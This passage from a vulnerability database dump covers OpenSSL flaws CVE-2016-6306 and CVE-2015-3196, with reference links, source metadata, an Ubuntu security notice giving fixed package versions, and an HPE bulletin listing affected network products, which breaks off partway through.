"http://aix.software.ibm.com/aix/efixes/security/openssl_advisory21.asc" }, { "trust": 0.3, "url": "https://www.ibm.com/blogs/psirt/ibm-security-bulletin-multiple-vulnerabilities-in-openssl-affect-ibm-worklight-and-ibm-mobilefirst-platform-foundation-2/" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1024394" }, { "trust": 0.3, "url": "http://www.ibm.com/support/docview.wss?uid=isg3t1024401" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1024507" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1024648" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=nas8n1021643" }, { "trust": 0.3, "url": "http://www.oracle.com/technetwork/security-advisory/cpuapr2017-3236618.html" }, { "trust": 0.3, "url": "http://www.oracle.com/technetwork/security-advisory/cpujan2017-2881727.html" }, { "trust": 0.3, "url": "https://kc.mcafee.com/resources/sites/mcafee/content/live/product_documentation/27000/pd27128/en_us/meg_7_6_406_3402_103_release_notes_en_us.pdf" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21991896" }, { "trust": 0.3, "url": "https://support.f5.com/kb/en-us/solutions/public/k/90/sol90492697.html?sr=59127107" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1009586" }, { "trust": 0.3, "url": "http://www.ibm.com/support/docview.wss?uid=ssg1s1009648" }, { "trust": 0.3, "url": "https://www-01.ibm.com/support/docview.wss?uid=swg21985392" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21991724" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21992348" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21992427" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21992681" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21992898" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21993061" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21993601" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21993856" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21993875" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21995129" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21995392" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21995393" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21995691" }, { "trust": 0.3, "url": "https://access.redhat.com/articles/11258" }, { "trust": 0.3, "url": "https://access.redhat.com/security/team/key/" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2017-3731" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-7055" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2017-3738" }, { "trust": 0.3, "url": "https://access.redhat.com/security/cve/cve-2017-3731" }, { "trust": 0.3, "url": "https://access.redhat.com/security/cve/cve-2017-3737" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2017-3732" }, { "trust": 0.3, "url": "https://access.redhat.com/security/cve/cve-2017-3738" }, { "trust": 0.3, "url": "https://access.redhat.com/security/cve/cve-2017-3732" }, { "trust": 0.3, "url": "https://access.redhat.com/documentation/en-us/red_hat_jboss_core_services/2.4.29/" }, { "trust": 0.3, "url": "https://access.redhat.com/security/updates/classification/#moderate" }, { "trust": 0.3, "url": "https://access.redhat.com/security/cve/cve-2016-7055" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2017-3737" }, { "trust": 0.3, "url": "https://access.redhat.com/security/cve/cve-2017-3736" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2017-3736" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-6303" }, { "trust": 0.2, "url": "https://issues.jboss.org/):" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-6305" }, { "trust": 0.1, "url": "https://cwe.mitre.org/data/definitions/125.html" }, { "trust": 0.1, "url": "https://github.com/live-hack-cve/cve-2016-6306" }, { "trust": 0.1, "url": "https://nvd.nist.gov" }, { "trust": 0.1, "url": "https://usn.ubuntu.com/3087-2/" }, { "trust": 0.1, "url": "https://www.cisa.gov/uscert/ics/advisories/icsa-22-349-21" }, { "trust": 0.1, "url": "http://tools.cisco.com/security/center/viewalert.x?alertid=49001" }, { "trust": 0.1, "url": "https://access.redhat.com/security/updates/classification/#important" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-2180" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-2177" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-2181" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-6304" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-2179" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-2178" }, { "trust": 0.1, "url": "https://www.openssl.org/blog/blog/2016/06/27/undefined-pointer-arithmetic/" }, { "trust": 0.1, "url": "https://www.debian.org/security/faq" }, { "trust": 0.1, "url": "https://www.debian.org/security/" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2107" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2109" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2106" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-2105" }, { "trust": 0.1, "url": "https://security.gentoo.org/" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-2183" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-2107" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-2178" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-2176" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-7052" }, { "trust": 0.1, "url": "http://creativecommons.org/licenses/by-sa/2.5" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-6304" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-6305" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2108" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-2106" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-2108" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-7052" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2105" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-2109" }, { "trust": 0.1, "url": "http://eprint.iacr.org/2016/594.pdf" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2176" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-2180" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-2177" }, { "trust": 0.1, "url": "https://bugs.gentoo.org." }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-6306" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openssl/1.0.1-4ubuntu5.37" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openssl/1.0.1f-1ubuntu2.20" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/openssl/1.0.2g-1ubuntu4.4" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-6308" }, { "trust": 0.1, "url": "https://www.openssl.org/policies/secpolicy.html" }, { "trust": 0.1, "url": "https://sweet32.info)" }, { "trust": 0.1, "url": "https://www.openssl.org/policies/releasestrat.html)," }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-6307" } ], "sources": [ { "db": "VULMON", "id": "CVE-2016-6306" }, { "db": "BID", "id": "93153" }, { "db": "JVNDB", "id": "JVNDB-2016-004992" }, { "db": "PACKETSTORM", "id": "138870" }, { "db": "PACKETSTORM", "id": "148521" }, { "db": "PACKETSTORM", "id": "148525" }, { "db": "PACKETSTORM", "id": "138817" }, { "db": "PACKETSTORM", "id": "140056" }, { "db": "PACKETSTORM", "id": "138820" }, { "db": "PACKETSTORM", "id": "148524" }, { "db": "PACKETSTORM", "id": "169633" }, { "db": "NVD", "id": "CVE-2016-6306" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "VULMON", "id": "CVE-2016-6306" }, { "db": "BID", "id": "93153" }, { "db": "JVNDB", "id": "JVNDB-2016-004992" }, { "db": "PACKETSTORM", "id": "138870" }, { "db": "PACKETSTORM", "id": "148521" }, { "db": "PACKETSTORM", "id": "148525" }, { "db": "PACKETSTORM", "id": "138817" }, { "db": "PACKETSTORM", "id": "140056" }, { "db": "PACKETSTORM", "id": "138820" }, { "db": "PACKETSTORM", "id": "148524" }, { "db": "PACKETSTORM", "id": "169633" }, { "db": "NVD", "id": "CVE-2016-6306" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2016-09-26T00:00:00", "db": "VULMON", "id": "CVE-2016-6306" }, { "date": "2016-09-23T00:00:00", "db": "BID", "id": "93153" }, { "date": "2016-09-30T00:00:00", "db": "JVNDB", "id": "JVNDB-2016-004992" }, { "date": "2016-09-27T19:32:00", "db": "PACKETSTORM", "id": "138870" }, { "date": "2018-07-12T21:45:18", "db": "PACKETSTORM", "id": "148521" }, { "date": "2018-07-12T21:48:57", "db": "PACKETSTORM", "id": "148525" }, { "date": "2016-09-22T22:22:00", "db": "PACKETSTORM", "id": "138817" }, { "date": "2016-12-07T16:37:31", "db": "PACKETSTORM", "id": "140056" }, { "date": "2016-09-22T22:25:00", "db": "PACKETSTORM", "id": "138820" }, { "date": "2018-07-12T21:48:49", "db": "PACKETSTORM", "id": "148524" }, { "date": "2016-09-22T12:12:12", "db": "PACKETSTORM", "id": "169633" }, { "date": "2016-09-26T19:59:02.910000", "db": "NVD", "id": "CVE-2016-6306" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2023-11-07T00:00:00", "db": "VULMON", "id": "CVE-2016-6306" }, { "date": "2017-12-19T22:37:00", "db": "BID", "id": "93153" }, { "date": "2017-07-25T00:00:00", "db": "JVNDB", "id": "JVNDB-2016-004992" }, { "date": "2023-11-07T02:33:57.240000", "db": "NVD", "id": "CVE-2016-6306" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "PACKETSTORM", "id": "138870" }, { "db": "PACKETSTORM", "id": "148525" }, { "db": "PACKETSTORM", "id": "138820" }, { "db": "PACKETSTORM", "id": "148524" } ], "trust": 0.4 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "OpenSSL Denial of service in a certificate parser (DoS) Vulnerabilities", "sources": [ { "db": "JVNDB", "id": "JVNDB-2016-004992" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Failure to Handle Exceptional Conditions", "sources": [ { "db": "BID", "id": "93153" } ], "trust": 0.3 } }
var-201512-0485
Vulnerability from variot
ssl/s3_clnt.c in OpenSSL 1.0.0 before 1.0.0t, 1.0.1 before 1.0.1p, and 1.0.2 before 1.0.2d, when used for a multi-threaded client, writes the PSK identity hint to an incorrect data structure, which allows remote servers to cause a denial of service (race condition and double free) via a crafted ServerKeyExchange message. OpenSSL is prone to denial-of-service vulnerability. An attacker may exploit this issue to cause a denial-of-service condition. ============================================================================ Ubuntu Security Notice USN-2830-1 December 07, 2015
openssl vulnerabilities
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 15.10
- Ubuntu 15.04
- Ubuntu 14.04 LTS
- Ubuntu 12.04 LTS
Summary:
Several security issues were fixed in OpenSSL. This issue only applied to Ubuntu 15.10. This issue only applied to Ubuntu 15.10. (CVE-2015-3194)
Adam Langley discovered that OpenSSL incorrectly handled malformed X509_ATTRIBUTE structures. (CVE-2015-3195)
It was discovered that OpenSSL incorrectly handled PSK identity hints. This issue only applied to Ubuntu 12.04 LTS, Ubuntu 14.04 LTS and Ubuntu 15.04. (CVE-2015-3196)
Update instructions:
The problem can be corrected by updating your system to the following package versions:
Ubuntu 15.10: libssl1.0.0 1.0.2d-0ubuntu1.2
Ubuntu 15.04: libssl1.0.0 1.0.1f-1ubuntu11.5
Ubuntu 14.04 LTS: libssl1.0.0 1.0.1f-1ubuntu2.16
Ubuntu 12.04 LTS: libssl1.0.0 1.0.1-4ubuntu5.32
After a standard system update you need to reboot your computer to make all the necessary changes. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256
Note: the current version of the following document is available here: https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c05398322
SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: c05398322 Version: 1
HPESBHF03709 rev.1 - HPE Network products including Comware, IMC, and VCX running OpenSSL, Remote Denial of Service (DoS), Disclosure of Sensitive Information
NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.
Release Date: 2017-02-21 Last Updated: 2017-02-21
Potential Security Impact: Remote: Denial of Service (DoS), Disclosure of Sensitive Information
Source: Hewlett Packard Enterprise, Product Security Response Team
VULNERABILITY SUMMARY Potential security vulnerabilities with OpenSSL have been addressed for HPE Network products including Comware 5, Comware 7, IMC, and VCX. The vulnerabilities could be remotely exploited resulting in Denial of Service (DoS) or disclosure of sensitive information.
References:
- CVE-2015-1794 - Remote Denial of Service (DoS)
- CVE-2015-3193 - Remote disclosure of sensitive information
- CVE-2015-3194 - Remote Denial of Service (DoS)
- CVE-2015-3195 - Remote disclosure of sensitive information
- CVE-2015-3196 - Remote Denial of Service (DoS)
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
- Comware 5 (CW5) Products All versions - Please refer to the RESOLUTION below for a list of updated products.
- Comware 7 (CW7) Products All versions - Please refer to the RESOLUTION below for a list of updated products.
- HPE Intelligent Management Center (iMC) All versions - Please refer to the RESOLUTION below for a list of updated products.
- VCX Products All versions - Please refer to the RESOLUTION below for a list of updated products.
BACKGROUND
CVSS Base Metrics ================= Reference, CVSS V3 Score/Vector, CVSS V2 Score/Vector
CVE-2015-1794
5.3 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)
CVE-2015-3193
5.3 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
5.0 (AV:N/AC:L/Au:N/C:P/I:N/A:N)
CVE-2015-3194
5.3 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)
CVE-2015-3195
5.3 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
5.0 (AV:N/AC:L/Au:N/C:N/I:N/A:P)
CVE-2015-3196
5.3 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
4.3 (AV:N/AC:M/Au:N/C:N/I:N/A:P)
Information on CVSS is documented in
HPE Customer Notice HPSN-2008-002 here:
https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c01345499
RESOLUTION
HPE has made the following software updates to resolve the vulnerabilities in the Comware, IMC and VCX products running OpenSSL.
COMWARE 5 Products
- A6600 (Comware 5) - Version: R3303P28
- HP Network Products
- JC165A HP 6600 RPE-X1 Router Module
- JC177A HP 6608 Router
- JC177B HP 6608 Router Chassis
- JC178A HP 6604 Router Chassis
- JC178B HP 6604 Router Chassis
- JC496A HP 6616 Router Chassis
- JC566A HP 6600 RSE-X1 Router Main Processing Unit
- JG780A HP 6600 RSE-X1 TAA-compliant Main Processing Unit
- JG781A HP 6600 RPE-X1 TAA-compliant Main Processing Unit
- HSR6602 (Comware 5) - Version: R3303P28
- HP Network Products
- JC176A HP 6602 Router Chassis
- JG353A HP HSR6602-G Router
- JG354A HP HSR6602-XG Router
- JG355A HP 6600 MCP-X1 Router Main Processing Unit
- JG356A HP 6600 MCP-X2 Router Main Processing Unit
- JG776A HP HSR6602-G TAA-compliant Router
- JG777A HP HSR6602-XG TAA-compliant Router
- JG778A HP 6600 MCP-X2 Router TAA-compliant Main Processing Unit
- HSR6800 (Comware 5) - Version: R3303P28
- HP Network Products
- JG361A HP HSR6802 Router Chassis
- JG361B HP HSR6802 Router Chassis
- JG362A HP HSR6804 Router Chassis
- JG362B HP HSR6804 Router Chassis
- JG363A HP HSR6808 Router Chassis
- JG363B HP HSR6808 Router Chassis
- JG364A HP HSR6800 RSE-X2 Router Main Processing Unit
- JG779A HP HSR6800 RSE-X2 Router TAA-compliant Main Processing Unit
- MSR20 (Comware 5) - Version: R2516
- HP Network Products
- JD432A HP A-MSR20-21 Router
- JD662A HP MSR20-20 Router
- JD663A HP A-MSR20-21 Router
- JD663B HP MSR20-21 Router
- JD664A HP MSR20-40 Router
- JF228A HP MSR20-40 Router
- JF283A HP MSR20-20 Router
- MSR20-1X (Comware 5) - Version: R2516
- HP Network Products
- JD431A HP MSR20-10 Router
- JD667A HP MSR20-15 IW Multi-Service Router
- JD668A HP MSR20-13 Multi-Service Router
- JD669A HP MSR20-13 W Multi-Service Router
- JD670A HP MSR20-15 A Multi-Service Router
- JD671A HP MSR20-15 AW Multi-Service Router
- JD672A HP MSR20-15 I Multi-Service Router
- JD673A HP MSR20-11 Multi-Service Router
- JD674A HP MSR20-12 Multi-Service Router
- JD675A HP MSR20-12 W Multi-Service Router
- JD676A HP MSR20-12 T1 Multi-Service Router
- JF236A HP MSR20-15-I Router
- JF237A HP MSR20-15-A Router
- JF238A HP MSR20-15-I-W Router
- JF239A HP MSR20-11 Router
- JF240A HP MSR20-13 Router
- JF241A HP MSR20-12 Router
- JF806A HP MSR20-12-T Router
- JF807A HP MSR20-12-W Router
- JF808A HP MSR20-13-W Router
- JF809A HP MSR20-15-A-W Router
- JF817A HP MSR20-15 Router
- JG209A HP MSR20-12-T-W Router (NA)
- JG210A HP MSR20-13-W Router (NA)
- MSR 30 (Comware 5) - Version: R2516
- HP Network Products
- JD654A HP MSR30-60 POE Multi-Service Router
- JD657A HP MSR30-40 Multi-Service Router
- JD658A HP MSR30-60 Multi-Service Router
- JD660A HP MSR30-20 POE Multi-Service Router
- JD661A HP MSR30-40 POE Multi-Service Router
- JD666A HP MSR30-20 Multi-Service Router
- JF229A HP MSR30-40 Router
- JF230A HP MSR30-60 Router
- JF232A HP RTMSR3040-AC-OVSAS-H3
- JF235A HP MSR30-20 DC Router
- JF284A HP MSR30-20 Router
- JF287A HP MSR30-40 DC Router
- JF801A HP MSR30-60 DC Router
- JF802A HP MSR30-20 PoE Router
- JF803A HP MSR30-40 PoE Router
- JF804A HP MSR30-60 PoE Router
- JG728A HP MSR30-20 TAA-compliant DC Router
- JG729A HP MSR30-20 TAA-compliant Router
- MSR 30-16 (Comware 5) - Version: R2516
- HP Network Products
- JD659A HP MSR30-16 POE Multi-Service Router
- JD665A HP MSR30-16 Multi-Service Router
- JF233A HP MSR30-16 Router
- JF234A HP MSR30-16 PoE Router
- MSR 30-1X (Comware 5) - Version: R2516
- HP Network Products
- JF800A HP MSR30-11 Router
- JF816A HP MSR30-10 2 FE /2 SIC /1 MIM MS Rtr
- JG182A HP MSR30-11E Router
- JG183A HP MSR30-11F Router
- JG184A HP MSR30-10 DC Router
- MSR 50 (Comware 5) - Version: R2516
- HP Network Products
- JD433A HP MSR50-40 Router
- JD653A HP MSR50 Processor Module
- JD655A HP MSR50-40 Multi-Service Router
- JD656A HP MSR50-60 Multi-Service Router
- JF231A HP MSR50-60 Router
- JF285A HP MSR50-40 DC Router
- JF640A HP MSR50-60 Rtr Chassis w DC PwrSupply
- MSR 50-G2 (Comware 5) - Version: R2516
- HP Network Products
- JD429A HP MSR50 G2 Processor Module
- JD429B HP MSR50 G2 Processor Module
- MSR 9XX (Comware 5) - Version: R2516
- HP Network Products
- JF812A HP MSR900 Router
- JF813A HP MSR920 Router
- JF814A HP MSR900-W Router
- JF815A HP MSR920 2FEWAN/8FELAN/.11 b/g Rtr
- JG207A HP MSR900-W Router (NA)
- JG208A HP MSR920-W Router (NA)
- MSR 93X (Comware 5) - Version: R2516
- HP Network Products
- JG511A HP MSR930 Router
- JG511B HP MSR930 Router
- JG512A HP MSR930 Wireless Router
- JG513A HP MSR930 3G Router
- JG513B HP MSR930 3G Router
- JG514A HP MSR931 Router
- JG514B HP MSR931 Router
- JG515A HP MSR931 3G Router
- JG516A HP MSR933 Router
- JG517A HP MSR933 3G Router
- JG518A HP MSR935 Router
- JG518B HP MSR935 Router
- JG519A HP MSR935 Wireless Router
- JG520A HP MSR935 3G Router
- JG531A HP MSR931 Dual 3G Router
- JG531B HP MSR931 Dual 3G Router
- JG596A HP MSR930 4G LTE/3G CDMA Router
- JG597A HP MSR936 Wireless Router
- JG665A HP MSR930 4G LTE/3G WCDMA Global Router
- JG704A HP MSR930 4G LTE/3G WCDMA ATT Router
- JH009A HP MSR931 Serial (TI) Router
- JH010A HP MSR933 G.SHDSL (TI) Router
- JH011A HP MSR935 ADSL2+ (TI) Router
- JH012A HP MSR930 Wireless 802.11n (NA) Router
- JH012B HP MSR930 Wireless 802.11n (NA) Router
- JH013A HP MSR935 Wireless 802.11n (NA) Router
- MSR1000 (Comware 5) - Version: See Mitigation
- HP Network Products
- JG732A HP MSR1003-8 AC Router
- 12500 (Comware 5) - Version: R1829P02
- HP Network Products
- JC072B HP 12500 Main Processing Unit
- JC085A HP A12518 Switch Chassis
- JC086A HP A12508 Switch Chassis
- JC652A HP 12508 DC Switch Chassis
- JC653A HP 12518 DC Switch Chassis
- JC654A HP 12504 AC Switch Chassis
- JC655A HP 12504 DC Switch Chassis
- JC808A HP 12500 TAA Main Processing Unit
- JF430A HP A12518 Switch Chassis
- JF430B HP 12518 Switch Chassis
- JF430C HP 12518 AC Switch Chassis
- JF431A HP A12508 Switch Chassis
- JF431B HP 12508 Switch Chassis
- JF431C HP 12508 AC Switch Chassis
- 9500E (Comware 5) - Version: R1829P02
- HP Network Products
- JC124A HP A9508 Switch Chassis
- JC124B HP 9505 Switch Chassis
- JC125A HP A9512 Switch Chassis
- JC125B HP 9512 Switch Chassis
- JC474A HP A9508-V Switch Chassis
- JC474B HP 9508-V Switch Chassis
- 10500 (Comware 5) - Version: R1210P02
- HP Network Products
- JC611A HP 10508-V Switch Chassis
- JC612A HP 10508 Switch Chassis
- JC613A HP 10504 Switch Chassis
- JC614A HP 10500 Main Processing Unit
- JC748A HP 10512 Switch Chassis
- JG375A HP 10500 TAA-compliant Main Processing Unit
- JG820A HP 10504 TAA-compliant Switch Chassis
- JG821A HP 10508 TAA-compliant Switch Chassis
- JG822A HP 10508-V TAA-compliant Switch Chassis
- JG823A HP 10512 TAA-compliant Switch Chassis
- 7500 (Comware 5) - Version: R6710P02
- HP Network Products
- JC666A HP 7503-S 144Gbps Fabric/MPU with PoE Upgradable 20-port Gig-T/4-port GbE Combo
- JC697A HP 7502 TAA-compliant Main Processing Unit
- JC698A HP 7503-S 144Gbps TAA Fabric / MPU with 16 GbE SFP Ports and 8 GbE Combo Ports
- JC699A HP 7500 384Gbps TAA-compliant Fabric / MPU with 2 10GbE XFP Ports
- JC700A HP 7500 384Gbps TAA-compliant Fabric / Main Processing Unit
- JC701A HP 7500 768Gbps TAA-compliant Fabric / Main Processing Unit
- JD193A HP 7500 384Gbps Fabric Module with 2 XFP Ports
- JD193B HP 7500 384Gbps Fabric Module with 2 XFP Ports
- JD194A HP 7500 384Gbps Fabric Module
- JD194B HP 7500 384Gbps Fabric Module
- JD195A HP 7500 384Gbps Advanced Fabric Module
- JD196A HP 7502 Fabric Module
- JD220A HP 7500 768Gbps Fabric Module
- JD224A HP 7500 384Gbps Fabric Module with 12 SFP Ports
- JD238A HP 7510 Switch Chassis
- JD238B HP 7510 Switch Chassis
- JD239A HP 7506 Switch Chassis
- JD239B HP 7506 Switch Chassis
- JD240A HP 7503 Switch Chassis
- JD240B HP 7503 Switch Chassis
- JD241A HP 7506-V Switch Chassis
- JD241B HP 7506-V Switch Chassis
- JD242A HP 7502 Switch Chassis
- JD242B HP 7502 Switch Chassis
- JD243A HP 7503-S Switch Chassis with 1 Fabric Slot
- JD243B HP 7503-S Switch Chassis with 1 Fabric Slot
- JE164A HP E7902 Switch Chassis
- JE165A HP E7903 Switch Chassis
- JE166A HP E7903 1 Fabric Slot Switch Chassis
- JE167A HP E7906 Switch Chassis
- JE168A HP E7906 Vertical Switch Chassis
- JE169A HP E7910 Switch Chassis
- 6125G/XG Blade Switch - Version: R2112P05
- HP Network Products
- 737220-B21 HP 6125G Blade Switch with TAA
- 737226-B21 HP 6125G/XG Blade Switch with TAA
- 658250-B21 HP 6125G/XG Blade Switch Opt Kit
- 658247-B21 HP 6125G Blade Switch Opt Kit
- 5830 (Comware 5) - Version: R1118P13
- HP Network Products
- JC691A HP 5830AF-48G Switch with 1 Interface Slot
- JC694A HP 5830AF-96G Switch
- JG316A HP 5830AF-48G TAA-compliant Switch w/1 Interface Slot
- JG374A HP 5830AF-96G TAA-compliant Switch
- 5800 (Comware 5) - Version: R1810P03
- HP Network Products
- JC099A HP 5800-24G-PoE Switch
- JC099B HP 5800-24G-PoE+ Switch
- JC100A HP 5800-24G Switch
- JC100B HP 5800-24G Switch
- JC101A HP 5800-48G Switch with 2 Slots
- JC101B HP 5800-48G-PoE+ Switch with 2 Interface Slots
- JC103A HP 5800-24G-SFP Switch
- JC103B HP 5800-24G-SFP Switch with 1 Interface Slot
- JC104A HP 5800-48G-PoE Switch
- JC104B HP 5800-48G-PoE+ Switch with 1 Interface Slot
- JC105A HP 5800-48G Switch
- JC105B HP 5800-48G Switch with 1 Interface Slot
- JG254A HP 5800-24G-PoE+ TAA-compliant Switch
- JG254B HP 5800-24G-PoE+ TAA-compliant Switch
- JG255A HP 5800-24G TAA-compliant Switch
- JG255B HP 5800-24G TAA-compliant Switch
- JG256A HP 5800-24G-SFP TAA-compliant Switch with 1 Interface Slot
- JG256B HP 5800-24G-SFP TAA-compliant Switch with 1 Interface Slot
- JG257A HP 5800-48G-PoE+ TAA-compliant Switch with 1 Interface Slot
- JG257B HP 5800-48G-PoE+ TAA-compliant Switch with 1 Interface Slot
- JG258A HP 5800-48G TAA-compliant Switch with 1 Interface Slot
- JG258B HP 5800-48G TAA-compliant Switch with 1 Interface Slot
- JG225A HP 5800AF-48G Switch
- JG225B HP 5800AF-48G Switch
- JG242A HP 5800-48G-PoE+ TAA-compliant Switch with 2 Interface Slots
- JG242B HP 5800-48G-PoE+ TAA-compliant Switch with 2 Interface
- JG243A HP 5820-24XG-SFP+ TAA-compliant Switch
- JG243B HP 5820-24XG-SFP+ TAA-compliant Switch
- JG259A HP 5820X-14XG-SFP+ TAA-compliant Switch with 2 Interface Slots & 1 OAA Slot
- JG259B HP 5820-14XG-SFP+ TAA-compliant Switch with 2 Interface Slots and 1 OAA Slot
- JC106A HP 5820-14XG-SFP+ Switch with 2 Slots
- JC106B HP 5820-14XG-SFP+ Switch with 2 Interface Slots & 1 OAA Slot
- JG219A HP 5820AF-24XG Switch
- JG219B HP 5820AF-24XG Switch
- JC102A HP 5820-24XG-SFP+ Switch
- JC102B HP 5820-24XG-SFP+ Switch
- 5500 HI (Comware 5) - Version: R5501P21
- HP Network Products
- JG311A HP 5500-24G-4SFP HI Switch with 2 Interface Slots
- JG312A HP 5500-48G-4SFP HI Switch with 2 Interface Slots
- JG541A HP 5500-24G-PoE+-4SFP HI Switch with 2 Interface Slots
- JG542A HP 5500-48G-PoE+-4SFP HI Switch with 2 Interface Slots
- JG543A HP 5500-24G-SFP HI Switch with 2 Interface Slots
- JG679A HP 5500-24G-PoE+-4SFP HI TAA-compliant Switch with 2 Interface Slots
- JG680A HP 5500-48G-PoE+-4SFP HI TAA-compliant Switch with 2 Interface Slots
- JG681A HP 5500-24G-SFP HI TAA-compliant Switch with 2 Interface Slots
- 5500 EI (Comware 5) - Version: R2221P22
- HP Network Products
- JD373A HP 5500-24G DC EI Switch
- JD374A HP 5500-24G-SFP EI Switch
- JD375A HP 5500-48G EI Switch
- JD376A HP 5500-48G-PoE EI Switch
- JD377A HP 5500-24G EI Switch
- JD378A HP 5500-24G-PoE EI Switch
- JD379A HP 5500-24G-SFP DC EI Switch
- JG240A HP 5500-48G-PoE+ EI Switch with 2 Interface Slots
